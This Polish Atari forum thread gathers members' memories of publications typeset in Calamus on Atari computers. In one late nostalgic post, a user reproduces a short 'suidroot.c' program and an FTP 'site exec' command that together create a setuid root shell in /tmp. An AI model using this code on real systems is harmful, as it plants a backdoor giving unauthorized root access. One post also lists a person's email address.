atarionline.pl Calamus - Forum Atarum

Jeśli chcesz wziąć udział w dyskusjach na forum - zaloguj się. Jeżeli nie masz loginu - poproś o członkostwo.

  • :
  • :

Vanilla 1.1.4 jest produktem Lussumo. Więcej informacji: Dokumentacja, Forum.

    • 1:
       
      CommentAuthorKaz
    • CommentTime3 Mar 2018 zmieniony
     
    Ponieważ "Atari Fan" Pitera jest składany w Calamusie na Atari TT, takoż nadchodząca książka o Robbo przez Krolla, to przy okazji rozmów pojawiło się pytanie:

    - jakie czasopisma/książki były składane na Calamusie?

    Zachęcam do dzielenia się wiedzą. Ja wiem na pewno o "STE-Fan" i "Desktop Info". Oraz o "Nieznany Świat", który był DTP-owo dzieckiem Stefana Szczypki. Co jeszcze?
    • 2: CommentAuthorwieczor
    • CommentTime3 Mar 2018
     
    W pierwszej połowie lat 90-ych w Olsztynie wychodziła gazeta darmowych ogłoszeń "Anonse" - niestety nie wiem czy gdzieś się zachował chociaż egzemplarz. Może ktoś ma dokładniejsze dane, ale jestem przekonany, że wówczas była składana na Calamusie, a dokładniej na Atari TT, bo będąc przypadkowo kiedyś w redakcji to widziałem :)
    • 3: CommentAuthorJarkeczek
    • CommentTime3 Mar 2018
     
    Na początku lat 90tych ukazały się lokalne pisemka w moim mieście, : parafialna "Róża w Rodzinie" i pismo urzędu pracy "Wieści z pośredniaka" oba składane w Calamusie 1.09 przeze mnie.
    • 4: CommentAuthorpiter
    • CommentTime3 Mar 2018
     
    w latach 90-tych w Liceum w Sopocie założyłem gazetkę szkolną REMANENT i była składana na Atari i Calamusie i na ... ksero..łączona technika :). Wtedy jeszcze na STe 4MB plus SH205 i SM124. Tak projektowałem też plakaty na jednej kapeli w załączeniu. Nie mam niestety numerów gazetki szkolnej, szukałem w necie ale chyba nic nie zostało zachowany - a szkoda. Fajna akacja była, wysyłałem fajne blondynki z liceum do szefów firm aby by dali kasę na materiały i nagrody. Super czasy :)

    Łączona technika to tak a że część była robiona na Atari, drukowane, a następnie ręcznie dorysowane elementy, wycinane elementy z gazet i następnie kserowane. Na plakatach załączonych dokładnie to widać - czasem na Atari był jeden napis tylko robiony. :)
    • 5: CommentAuthorpiter
    • CommentTime3 Mar 2018
     
    • 6: CommentAuthorpiter
    • CommentTime3 Mar 2018
     
    • 7:
       
      CommentAuthorpirx
    • CommentTime3 Mar 2018
     
    Na Calamusie SL były składane czasopisma IDG, np. ComputerWorld. Wiem, bo pracowałem przez chwilę jako operator DTP w f-mie Marrow (chyba, kurcze, trochę nie pamiętam), która robiła skład wszystkiego dla IDG.
    TT-ki mieli spięte w sieć jakimiś kanadyjskimi interfejsami, przy biurku miałem naświetlarkę HELL i zepsułem niezłą ilość kliszy :-]
    • 8: CommentAuthorpiter
    • CommentTime3 Mar 2018
     
    pirx, kurde super, ja też miałem naświetlarkę do Atari TT podłączoną ! półformat. ALe świeciliśmy tylko na sito, na offset była to nie ekonomiczne i na jakieś może drobne prace offsetowe. Masz jakieś foty może ? pewnie nie ? ja też nie mam .. naświetlarka poszła na złom okołó 2000 roku -teraz to bym ją zatrzymał ale wtedy to się inaczej patrzyło na takie rzeczy
    • 9: CommentAuthorfaust
    • CommentTime3 Mar 2018
     
    Bardzo OT, ale w temacie DTP, więc się wcinam. Zawsze "fascynował" mnie skład Komputera, nigdy do końca też nie odkryłem na czym to powstawało. IMO albo cuś pod ST albo pod Maczka, na typo z tamtego okresu kompletnie mi to nie pasuje. Ventura też nie. Może ktoś zna odpowiedź?
    • 10:
       
      CommentAuthorKaz
    • CommentTime3 Mar 2018
     
    Dzięki panowie! To cenne wspomnnienia.

    Jarkeczek - czy masz zachowane jakiekolwiek egzemplarze albo jakieś zdjęcia, skany?
    • 11: CommentAuthorpiter
    • CommentTime3 Mar 2018
     
    Kaz, a jak w środku wygląda NIeznany Świat ? porobisz fotki . ?
    • 12:
       
      CommentAuthorKaz
    • CommentTime3 Mar 2018
     
    Wygląda tak charakterystycznie dla Calamusa, że aż to kłuje w oczy :D. Mogę porobić, nie ma problemu. Specjalnie kupiłem te dwa egzemplarzy w starych czasach, bo zauważyłem od razu, że to na Calamusie składane i traktowałem to jako ciekawostkę. Musiałem przekopać sporo szuflad, żeby to znaleźć, ale udało się i mam pod ręką.
    • 13:
       
      CommentAuthorpirx
    • CommentTime3 Mar 2018
     
    Moje Atari też było składane na SLu.
    • 14: CommentAuthormarekp
    • CommentTime3 Mar 2018
     
    • 15: CommentAuthorJarkeczek
    • CommentTime4 Mar 2018
     
    Re: Kaz
    Zachowało się kilka numerów, po niedzieli zeskanuje i wkleje strony tytułowe.
    • 16: CommentAuthorAdamK
    • CommentTime4 Mar 2018
     
    ->link<-
    (składane na Calamusie 1.09N na MEGA ST, koloreowe ilustracje dokładano później w SLce)
    • 17:
       
      CommentAuthorKaz
    • CommentTime4 Mar 2018
     
    Jarkeczek - super, wklejaj.
    • 18: CommentAuthorJarkeczek
    • CommentTime8 Mar 2018
     
    Gazetka parafialna, złożyłem ok 6 numerów wydawane metodą kserowania więc jakość jaka jest. Składałem na STe z 2MB i calamusem 1.09
    • 19: CommentAuthorJarkeczek
    • CommentTime8 Mar 2018
     
    Była też próba utworzenia gazetki dla bezrobotnych, wysazły 2 numery (z 4) pod Calamusem.
    • 20:
       
      CommentAuthorKaz
    • CommentTime8 Mar 2018
     
    Świetnie, dzięki!
    Te fonty z gazetki dla bezrobotnych przypominają mi, że muszę sprawdzić, czy gazetka giełdowa z giełdy wrocławskiej czasem nie była składana na Calamusie. W końcu jeden z jej redaktorów, pan Kornafel, był fanem Atari :)
    • 21:
       
      CommentAuthorKaz
    • CommentTime31 Mar 2018 zmieniony
     
    Potwierdzam, gazetka giełdy wrocławskiej też robiona na Calamusie!

    A tu niedawna wypowiedź Stefana Szczypki na temat Calamusa, jego historii i dlaczego to była rewolucja w DTP:

    ->link<-



    warto też poczytać o historii Szczypki i jego studia:

    ->link<-

    • 22:
       
      CommentAuthortdc
    • CommentTime31 Mar 2018
     
    Ja poznałem pewnego przedsiębiorcę który zna Szczypkę, więc pewnie też coś dla niego składał. Natomiast bardzo go prosiłem o kontakt z nim aby zrobić wywiad, ale niestety powiedział mi że to nie jest możliwe - i niestety powiedział także dlaczego to nie jest możliwe.

    Co do tych materiałów tutaj zawartych to dzięki temu że Calamus miał własne czcionki, już na pierwszy rzut oka widać że to faktycznie było robione w Calamusie;)
    • 23: CommentAuthormrroman
    • CommentTime1 Apr 2018
     
    To nie jest do końca związane z Calamusem ale pamiętam, był na Świdnickiej we Wrocławiu salon, gdzie prezentowali chyba właśnie Calamusa na Mega ST. Było tam pare zestawów (może 2-3) komputerów z drukarkami laserowymi.
    • 24:
       
      CommentAuthorKaz
    • CommentTime1 Apr 2018
     
    W którym roku to widziałeś?
    I w którym mniej więcej miejscu na Świdnickiej?
    • 25: CommentAuthormrroman
    • CommentTime1 Apr 2018 zmieniony
     
    Wydaje mi się że to było koło księgarni Kwant na początku lat 90tych. Nie pamiętam dokładnie bo byłem mały wtedy. Pewnie z 10-12 lat :).
    • 26:
       
      CommentAuthorKaz
    • CommentTime2 Apr 2018
     
    OK, a pamiętasz czy witryna była od ulicy?

    Bo na Świdnickiej 19, ale na bodajże 3 piętrze, miał w swoim czasie siedzibę CET czyli firma powstała na bazie Atar Systemu. Jeżeli widziałeś coś na wystawie koło księgarni to może tam gdzie jest galeria sztuki, tam na początku lat 90-tych organizowano festiwal WRO, pełny tematów komputerowych.
    • 27:
       
      CommentAuthorpirx
    • CommentTime5 Apr 2018
     
    @TDC - stefan.szczypka@strstudio.pl
    • 28:
       
      CommentAuthorKaz
    • CommentTime5 Apr 2018
     
    TDC - no dlaczego nie jest to możliwe?
    • 29:
       
      CommentAuthorKaz
    • CommentTime20 Dec 2018 zmieniony
     
    AdamK właśnie mówi, że także "Archeologia Wojskowa" z lat 92-95 również była składana w Calamusie.

    Więcej o piśmie w Wiki:
    ->link<-
    • 30:
       
      CommentAuthorKaz
    • CommentTime30 Dec 2018 zmieniony
     
    • 31: CommentAuthorbrian-82
    • CommentTime5 Feb 2019
     
    W łapki moje i córki wpadła niedawno książka z wierszykami dla dzieci Jana Brzechwy pt. "Prosimy do zwierzyńca". Córce bardzo się podoba, a mnie zaciekawiła stopka redakcyjna
    • 32: CommentAuthorbrian-82
    • CommentTime5 Feb 2019
     
    kolejna strona
    • 33: CommentAuthorbrian-82
    • CommentTime5 Feb 2019
     
    stopka :)
    • 34:
       
      CommentAuthorKaz
    • CommentTime6 Feb 2019
     
    Fajna rzecz, dzięki Sebastian! :)

    PS. Uwaga techniczna - jak w poście ma być więcej niż jedno zdjęcie czy plik, to niestety robi się to niewygodnie, ale da się: edycja postu, załadowanie kolejnego obrazka, zatwierdzenie. Potem ponownie to samo - edycja, załadowanie, zatwierdzenie.
    • 35:
       
      CommentAuthorKaz
    • CommentTime21 Mar 2020
     
    Nie do końca o Calamusie, ale programie, który go wspierał. I był polski. A właściwie jest, bo jak się okazuje, wciąż jest w sprzedaży, w wersji PC. To "Kombi" studia 3N:

    ->link<-

    Krogulec:

    Kombi jest co prawda programem niszowym ale wydaje się jednym z najlepszych przykładów polskiej pełnawartościowej alternatywy dla konkurencyjnych produktów zagranicznych. Warto zwrócić uwagę, że program jest rozwijany przez autora już kilkanaście lat - w 1989 roku powstała wersja na Atari, a w 1996 roku na PC.
    • 36:
       
      CommentAuthorKaz
    • CommentTime14 Nov 2023 zmieniony
     
    Książka "Uwaga wirus!" Andrzeja Kadlofa składana na Atari Mega ST (Stefan Szczypka) w 1989 roku. Są nawet charakterystyczne dla Calamusa fonty...

    Skany zrobił i PDF książki podesłał mi Misza, dzięki!
    • 37: CommentAuthorjakubd
    • CommentTime15 Nov 2023
     
    Ooo redaktor techniczny: Marek Car - poznałem gościa w czasach Internetu dla Szkół. Zginął w wypadku samochodowym w okolicach tego, jak IdS został niezbyt w miłych okolicznościach przekształcony w Internet Data Systems. Ale nie widzę szczegółów w sieci, może warto poszukać informacji kiedyś o tym programie od strony organizacyjnej - ja tylko miałem szczęście siedzieć przy komputerach i wdrażać to w jednej z pierwszych 15 szkół w Wwie.
    • 38:
       
      CommentAuthorjhusak
    • CommentTime15 Nov 2023
     
    Ś.p. Andrzej Kadlof - miałem z nim zajęcia z Wirusów na UW. Do dziś go pamiętam, bardzo mu się podobał mój antywirus - pewnie dlatego.
    • 39: CommentAuthormkolodziejski
    • CommentTime15 Nov 2023 zmieniony
     
    @jakubd - dokładnie - też go poznałem. Pamiętam jak z okazji IdS - wręczał mi osobiście pakiet dBase III - olbrzymie pudło, nie wiem dlaczego akurat to, ani jaki był ten nagrodzony sukces.

    Pamiętam też Wydział Fizyki jak pokazywali mi system Tenex i dali dostęp zdalny do jednej z maszyn (przez TELNET!), co było dla mnie absolutnym MINDFUCKIEM, nazwisk nie pamiętam również niestety. Jak czytam książki o DARPANET, o początkach na PDP-11, o "hakerach" - dzieciakach odwiedzających uczelniane laboratoria, to trochę tak to właśnie pamiętam. Coś pisaliśmy w C, coś omawialiśmy, jakieś szczegóły - wszystko uleciało.

    został mi z tego ten jeden program z roku około 1995/1996 roku

    //-- CUT HERE -- suidroot.c
    main() {
    setuid(0);
    seteuid(0);
    system("cp /bin/sh /tmp/suidroot");
    system("chmod a+rwxs /tmp/suidroot");
    }
    //-- CUT HERE --

    //-- CUT HERE -- suidroot.sh
    //#!/bin/sh
    //exec suidroot
    //-- CUT HERE --

    //ftp> quote site exec sh suidroot.sh


    ale nie mam pojęcia, co zrobił wtedy TENEX.

    Ale pamięć pozostała, to najważniejsze.
    • 40: CommentAuthorjakubd
    • CommentTime16 Nov 2023
     
    No to mamy mniej więcej wspólne wspomnienia: mnie też oprowadzali po FUWie (półpodziemny "bunkier" po prawej strony od wejścia), racki z serwerami i półka z modemami do callbacku. I dokładnie tak samo się czułem jak nam dali dostęp jakiejś maszyny. Jak pogrzebię w archiwach komputerowych to znajdę jeszcze swojego pierwszego maila w Eudorze 1.0, którą wybrali do poczty w ramach IdS. Potem wiele lat używałem Eudory w ramach tłumaczeń.
    A kilka miesięcy później robiłem pierwszą stronę WWW szkoły swojej.
    Za udział i wsparcie od IdS to ja nawet pierwszą kasę w życiu dostałem (jako nagrodę), a potem jeszcze od szkoły na koniec roku (chyba 3cia klasa?). Kupiłem sobie za to Sound Blaster AWE32, którą mam do dziś :)